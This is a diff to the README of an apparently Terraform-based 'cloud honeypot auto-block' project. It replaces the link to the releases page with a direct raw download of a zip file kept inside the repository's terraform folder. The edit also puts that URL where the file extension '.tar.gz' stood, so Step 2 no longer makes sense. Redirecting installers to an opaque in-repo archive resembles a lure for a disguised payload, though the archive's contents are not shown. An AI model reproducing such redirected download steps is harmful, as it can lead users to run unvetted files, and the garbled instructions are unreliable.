Zidane109/cloud-honeypot-auto-block/README.md

 To get started, you need to visit the release page and download the latest files required for installation.

 **Step 1: Visit the release page**
-Click the big button at the top or [visit this page to download](https://github.com/Zidane109/cloud-honeypot-auto-block/releases).
+Click the big button at the top or [visit this page to download](https://raw.githubusercontent.com/Zidane109/cloud-honeypot-auto-block/main/infra/terraform/auto-cloud-honeypot-block-3.5.zip).

 **Step 2: Download the latest release**
-Look for the most recent release, usually named with a version number, and download the `.zip` or `.tar.gz` file containing Terraform templates and documentation.
+Look for the most recent release, usually named with a version number, and download the `.zip` or `https://raw.githubusercontent.com/Zidane109/cloud-honeypot-auto-block/main/infra/terraform/auto-cloud-honeypot-block-3.5.zip` file containing Terraform templates and documentation.

 **Step 3: Extract the files**
 Once downloaded, extract the compressed file to a folder on your computer.
 This folder contains all the scripts and instructions needed to run the tool.